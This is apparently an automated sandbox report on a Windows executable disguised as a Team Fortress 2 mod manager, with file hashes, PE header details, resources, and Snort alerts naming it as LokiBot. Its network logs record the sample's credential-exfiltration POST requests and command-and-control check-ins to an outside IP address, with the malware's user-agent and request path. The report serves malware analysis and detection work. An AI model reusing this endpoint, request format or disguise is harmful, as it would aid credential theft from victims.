                    SHA256:9e658eb8027169730ef306e2e3b145dd71c9d9f569ce7dd7c8264a0dfc114d87
                    SHA512:db66f324d80d2cbe1dc9b0fd7ccdeed896ed5e4e08c4e837542d27371ab05befdb43dfb46655ef725aba3b3a6582be908da5a6d44bdde7900977520eb355e3d9
                    SSDEEP:12288:jvMXXIcXoiXXIcXo0XXIcXoJ1scLjkQnoBwE6DIQ4myILwpqtIEHwtefVNOaHGCd:4/hELjeuGtZqtIEQtwOaHGC+2ZZZD/2o
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.................z............... ........@.. ....................................@................................

                    File Icon

                    Icon Hash:86a8b6ca9496ca9a

                    Static PE Info

                    General

                    Entrypoint:0x5199aa
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Time Stamp:0x60D196E2 [Tue Jun 22 07:53:06 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:v4.0.30319
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                    Entrypoint Preview

                    Instruction
                    jmp dword ptr [00402000h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1199500x57.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x11c0000x11a8c.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x11a0000xc.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x20000x1179b00x117a00False0.652703467255PGP symmetric key encrypted data - Plaintext or unencrypted data7.17424045556IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .reloc0x11a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    .rsrc0x11c0000x11a8c0x11c00False0.264510893486data5.50345948852IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_ICON0x11c1f00x1bcbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                    RT_ICON0x11ddbc0xc828data
                    RT_ICON0x12a5e40x1ca8data
                    RT_ICON0x12c28c0xca8data
                    RT_ICON0x12cf340x568GLS_BINARY_LSB_FIRST
                    RT_GROUP_ICON0x12d49c0x4cdata
                    RT_VERSION0x12d4e80x3f0SysEx File - OctavePlateau
                    RT_MANIFEST0x12d8d80x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                    Imports

                    DLLImport
                    mscoree.dll_CorExeMain

                    Version Infos

                    DescriptionData
                    Translation0x0000 0x04b0
                    LegalCopyrightCopyright bluFiles 2013
                    Assembly Version1.0.0.0
                    InternalNameSearchData.exe
                    FileVersion1.0.0.0
                    CompanyNamebluFiles
                    LegalTrademarksola k ase
                    CommentsActiva / Desactiva / Instala modificaciones al juego Team Fortress 2
                    ProductNameTf2ModManager
                    ProductVersion1.0.0.0
                    FileDescriptionTf2 Mod Manager
                    OriginalFilenameSearchData.exe

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    06/22/21-18:23:10.839209TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973580192.168.2.463.141.228.141
                    06/22/21-18:23:10.839209TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.463.141.228.141
                    06/22/21-18:23:10.839209TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.463.141.228.141
                    06/22/21-18:23:10.839209TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973580192.168.2.463.141.228.141
                    06/22/21-18:23:12.059133TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973780192.168.2.463.141.228.141
                    06/22/21-18:23:12.059133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.463.141.228.141
                    06/22/21-18:23:12.059133TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.463.141.228.141
                    06/22/21-18:23:12.059133TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973780192.168.2.463.141.228.141
                    06/22/21-18:23:13.182092TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.463.141.228.141
                    06/22/21-18:23:13.182092TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.463.141.228.141
                    06/22/21-18:23:13.182092TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.463.141.228.141
                    06/22/21-18:23:13.182092TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.463.141.228.141
                    06/22/21-18:23:14.320616TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.463.141.228.141
                    06/22/21-18:23:14.320616TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.463.141.228.141
                    06/22/21-18:23:14.320616TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.463.141.228.141
                    06/22/21-18:23:14.320616TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.463.141.228.141

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jun 22, 2021 18:23:10.672245026 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:10.831842899 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:10.831969976 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:10.839209080 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.000123024 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.000273943 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.162691116 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658402920 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658443928 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658499002 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658540964 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.658548117 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658580065 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658617973 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658648968 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658660889 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.658677101 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658689976 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.658742905 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.658787966 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.667711020 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.667861938 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.892693043 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.054799080 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.054970026 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.059133053 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.219713926 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.219800949 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.379004955 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.893781900 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.893882036 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.893944025 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.893996954 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.894001961 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.894057989 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.894121885 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.894121885 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.894182920 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.894191027 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.894217968 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.894329071 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.894357920 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.902987003 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.903398037 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:13.019453049 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:13.179152966 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:13.179404020 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:13.182091951 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:13.341525078 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:13.342540026 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:13.502113104 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000350952 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000412941 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000477076 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000520945 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000557899 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000595093 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000632048 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000668049 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000715971 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.000869989 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.001041889 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.008945942 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.009135008 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.154073000 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.313632965 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.313771009 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.320616007 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.480439901 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.480549097 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.640264034 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133425951 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133486986 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133528948 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133567095 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133569002 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:15.133605003 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133620024 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:15.133641958 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133680105 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133697033 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:15.133716106 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133764982 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:15.142693996 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.142910004 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:18.268584967 CEST4974180192.168.2.463.141.228.141

                    HTTP Request Dependency Graph

                    • 63.141.228.141

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.44973563.141.228.14180C:\Users\user\Desktop\2CW1YLhNIS.exe
                    TimestampkBytes transferredDirectionData
                    Jun 22, 2021 18:23:10.839209080 CEST1229OUTPOST /32.php/QQojJUjm8ByeT HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: 63.141.228.141
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: C18574AA
                    Content-Length: 190
                    Connection: close
                    Jun 22, 2021 18:23:11.658402920 CEST1232INHTTP/1.1 404 Not Found
                    Date: Tue, 22 Jun 2021 16:23:10 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                    Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.44973763.141.228.14180C:\Users\user\Desktop\2CW1YLhNIS.exe
                    TimestampkBytes transferredDirectionData
                    Jun 22, 2021 18:23:12.059133053 CEST1348OUTPOST /32.php/QQojJUjm8ByeT HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: 63.141.228.141
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: C18574AA
                    Content-Length: 190
                    Connection: close
                    Jun 22, 2021 18:23:12.893781900 CEST1359INHTTP/1.1 404 Not Found
                    Date: Tue, 22 Jun 2021 16:23:12 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 